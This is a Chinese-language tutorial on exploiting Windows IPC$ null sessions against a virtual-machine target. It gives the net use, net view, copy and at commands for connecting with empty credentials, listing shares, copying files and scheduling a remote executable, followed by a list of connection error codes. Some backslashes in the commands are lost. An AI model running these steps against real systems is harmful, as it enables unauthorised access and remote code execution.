IPC$
責編:admin |2015-01-05 15:52:19ipc$所使用的端口
1 SMB:(Server Message Block) Windows協議族,用于文件打印共享的服務;
2 NBT:(NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口實現基于TCP/IP協議的NETBIOS網絡互聯。
3 在WindowsNT中SMB基于NBT實現,即使用139(TCP)端口;而在Windows2000中,SMB除了基于NBT實現,還可以直接通過445端口實現。
使用虛擬機模擬被攻擊方電腦:
使用掃描工具對該被攻擊方電腦進行掃描:
1 首先,我們先建立一個連接(當然,這需要目標開放ipc$)
命令:net use \ipipc$ "" /user:""
注意:上面的命令包括四個空格,net與use中間有一個空格,use后面一個,密碼左右各一個空格。
2 查看遠程主機的共享資源
命令:net view \ip
解釋:前提是建立了空連接后,用此命令可以查看遠程主機的共享資源,如果它開了共享,可以得到如下面的結果,但此命令不能顯示默認共享。(c$,d$,…..)
3 復制文件
命令: copy c:*.* \ip共享
4 查看遠程主機的當前時間
命令: net time \ip
解釋:用此命令可以得到一個遠程主機的當前時間。
5.運行
at \ip time 要運行作業文件的路徑(at \192.168.164.130 c: est.exe)
ipc$連接失敗的常見原因:
1 IPC連接是Windows NT及以上系統中特有的功能,由于其需要用到Windows NT中很多DLL函數,所以不能在Windows9.x/Me系統中運行,也就是說只有nt/2000/xp才可以相互建立ipc$連接,98/me是不能建立ipc$連接的;
2 如果想成功的建立一個ipc$連接,就需要響應方開啟ipc$共享,即使是空連接也是這樣,如果響應方關閉了ipc$共享,將不能建立連接;
3 連接發起方未啟動Lanmanworkstation服務(顯示名為:Workstation):它提供網絡鏈結和通訊,沒有它發起方無法發起連接請求;
4 響應方未啟動Lanmanserver服務(顯示名為:Server):它提供了 RPC 支持、文件、打印以及命名管道共享,ipc$依賴于此服務,沒有它主機將無法響應發起方的連接請求,不過沒有它仍可發起ipc$連接;
5 響應方未啟動NetLogon,它支持網絡上計算機 pass-through 帳戶登錄身份(不過這種情況好像不多);
6 響應方的139,445端口未處于監聽狀態或被防火墻屏蔽;
7 連接發起方未打開139,445端口;
8 用戶名或者密碼錯誤:如果發生這樣的錯誤,系統將給你類似于'無法更新密碼'這樣的錯誤提示(顯然空會話排除這種錯誤);
9 命令輸入錯誤:可能多了或少了空格,當用戶名和密碼中不包含空格時兩邊的雙引號可以省略,如果密碼為空,可以直接輸入兩個引號""即可;
10 如果在已經建立好連接的情況下對方重啟計算機,那么ipc$連接將會自動斷開,需要重新建立連接。
另外,你也可以根據返回的錯誤號分析原因:
錯誤號5,拒絕訪問:很可能你使用的用戶不是管理員權限的;
錯誤號51,Windows無法找到網絡路徑:網絡有問題;
錯誤號53,找不到網絡路徑:ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火墻(端口過濾);
錯誤號67,找不到網絡名:你的lanmanworkstation服務未啟動或者目標刪除了ipc$;
錯誤號1219,提供的憑據與已存在的憑據集沖突:你已經和對方建立了一個ipc$,請刪除再連;
錯誤號1326,未知的用戶名或錯誤密碼:原因很明顯了;
錯誤號1792,試圖登錄,但是網絡登錄服務沒有啟動:目標NetLogon服務未啟動;
錯誤號2242,此用戶的密碼已經過期:目標有帳號策略,強制定期要求更改密碼。